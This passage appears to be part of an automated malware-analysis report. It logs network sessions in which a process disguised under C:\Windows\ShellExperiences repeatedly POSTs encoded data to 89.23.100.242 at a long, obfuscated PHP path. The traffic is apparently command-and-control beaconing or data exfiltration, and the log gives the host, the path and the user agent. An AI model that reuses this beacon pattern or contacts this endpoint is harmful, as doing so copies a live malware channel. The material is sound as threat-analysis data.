                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.44974489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:35.943367958 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:36.298312902 CET2544OUTData Raw: 5c 54 43 5f 5e 56 56 5f 58 5b 57 56 50 5e 5b 56 55 51 5e 5a 54 5b 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TC_^VV_X[WVP^[VUQ^ZT[Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',1,<>"?(-*( );$Y!B'Q+$><=&-<]''_!/Y.=
                                                                                                Jan 10, 2025 07:57:36.700068951 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:36.833344936 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:36 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.44974689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:39.413741112 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2032
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:39.767108917 CET2032OUTData Raw: 59 57 46 55 5e 5b 56 56 58 5b 57 56 50 59 5b 51 55 55 5e 5c 54 50 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YWFU^[VVX[WVPY[QUU^\TPQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$.!,+=+&(8)-W+. X?<!/T+ **B1=3*'_!/Y.!
                                                                                                Jan 10, 2025 07:57:40.175774097 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:40.310460091 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:40 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 53 20 15 06 55 31 01 07 11 3a 01 21 53 2b 0e 06 1d 2a 5b 33 1d 3e 0a 23 1f 2e 2f 23 56 21 05 0b 5e 28 0c 2e 57 33 02 24 1f 25 27 21 59 0c 13 26 5b 3d 3a 00 08 29 2a 02 5a 28 0f 0b 1c 27 23 3c 01 27 3e 3e 0d 37 11 0e 5e 3e 3a 25 53 2a 32 2d 10 39 2a 38 5a 3d 3c 33 0e 30 0c 2a 57 0c 1f 26 1f 36 0c 39 13 22 1c 07 05 24 38 06 0f 25 28 30 1c 24 3c 37 59 20 39 23 1d 2e 07 37 05 35 00 0a 12 3e 58 3d 0d 36 22 33 0c 3c 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989S U1:!S+*[3>#./#V!^(.W3$%'!Y&[=:)*Z('#<'>>7^>:%S*2-9*8Z=<30*W&69"$8%(0$<7Y 9#.75>X=6"3< Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.44974789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:40.753892899 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:41.111181974 CET2544OUTData Raw: 5c 55 46 50 5e 56 56 52 58 5b 57 56 50 5c 5b 5a 55 50 5e 5e 54 58 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UFP^VVRX[WVP\[ZUP^^TXQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C,!]>-!_(</"+= +(+!$?0?=Y=&[<X0'_!/Y.
                                                                                                Jan 10, 2025 07:57:41.504169941 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:41.656285048 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.44974889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:42.188240051 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:42.532938004 CET2544OUTData Raw: 59 54 43 5f 5e 5b 56 52 58 5b 57 56 50 5f 5b 5b 55 53 5e 5d 54 51 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTC_^[VRX[WVP_[[US^]TQQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A/W3?-1Z<,:W(4<$5+T+3Z*Y*$>70'_!/Y.9
                                                                                                Jan 10, 2025 07:57:42.925580978 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:43.052711010 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.44975089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:44.026431084 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:44.376519918 CET2544OUTData Raw: 59 55 43 5e 5e 58 56 57 58 5b 57 56 50 58 5b 53 55 55 5e 5e 54 50 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUC^^XVWX[WVPX[SUU^^TPQ[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'.!Z<=%\(Y,:?#(^8"7(*#+><>2=,]3*'_!/Y.%
                                                                                                Jan 10, 2025 07:57:44.793194056 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:44.945664883 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:44 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.44975289.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:45.160131931 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.44975389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:45.325611115 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2032
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:45.673350096 CET2032OUTData Raw: 59 56 43 56 5e 5f 56 57 58 5b 57 56 50 5c 5b 54 55 5c 5e 5d 54 50 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YVCV^_VWX[WVP\[TU\^]TPQ\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A;13[?[:(54]/92>>4X?"'(?3)?& _$:'_!/Y.
                                                                                                Jan 10, 2025 07:57:46.060854912 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:46.213042021 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:46 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 54 20 3b 37 0d 26 2f 00 0d 39 01 32 0e 28 20 3c 10 3d 03 37 13 29 0d 24 0c 2e 2f 3b 55 35 3b 29 5e 28 0c 2d 08 30 3f 3c 53 26 37 21 59 0c 13 25 03 3c 14 0c 08 3d 39 24 59 3c 21 00 45 27 20 37 10 27 03 00 0a 21 3c 3c 5e 3e 39 2e 0d 3f 08 32 0d 2d 39 30 5b 2a 3c 33 0f 27 26 2a 57 0c 1f 25 0b 22 54 39 50 36 0b 3a 10 33 16 09 10 27 2b 34 1c 31 01 34 05 20 3a 09 10 3a 39 24 5d 36 3e 3b 02 3e 3d 39 0a 23 31 23 09 29 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989T ;7&/92( <=7)$./;U5;)^(-0?<S&7!Y%<=9$Y<!E' 7'!<<^>9.?2-90[*<3'&*W%"T9P6:3'+414 ::9$]6>;>=9#1#), Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.2.44975489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:45.486416101 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:45.855304956 CET2544OUTData Raw: 59 55 46 55 5e 56 56 51 58 5b 57 56 50 53 5b 56 55 51 5e 52 54 5a 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUFU^VVQX[WVPS[VUQ^RTZQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$8<-9^<68Z;><=)8X"4V(#3_>?% ':'_!/Y.
                                                                                                Jan 10, 2025 07:57:46.222455978 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:46.356924057 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:46 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.2.44975589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:47.815390110 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:48.173391104 CET2544OUTData Raw: 59 50 46 57 5e 5f 53 53 58 5b 57 56 50 53 5b 50 55 57 5e 5e 54 5d 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YPFW^_SSX[WVPS[PUW^^T]Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A.!$<-\( X-:)<-$(;8]"$ ?0*>A1='$'_!/Y.
                                                                                                Jan 10, 2025 07:57:48.556001902 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:48.685468912 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:48 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.2.44975689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:48.820349932 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:49.173388004 CET2544OUTData Raw: 5c 55 46 50 5e 56 53 50 58 5b 57 56 50 5e 5b 53 55 57 5e 52 54 5e 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UFP^VSPX[WVP^[SUW^RT^Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'E,$<1<P;;\1T?+<;464,??^)Y6F$.#3'_!/Y.=
                                                                                                Jan 10, 2025 07:57:49.563672066 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 37 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:57:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.2.44975789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:49.717104912 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:50.067127943 CET2544OUTData Raw: 59 50 43 50 5e 59 56 50 58 5b 57 56 50 5f 5b 53 55 51 5e 5c 54 5f 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YPCP^YVPX[WVP_[SUQ^\T_QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/!/+=.?57-9-?(('"7W<0/^+?"@%=$^3*'_!/Y.9
                                                                                                Jan 10, 2025 07:57:50.463190079 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:50.590858936 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:50 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.2.44975889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:50.724101067 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
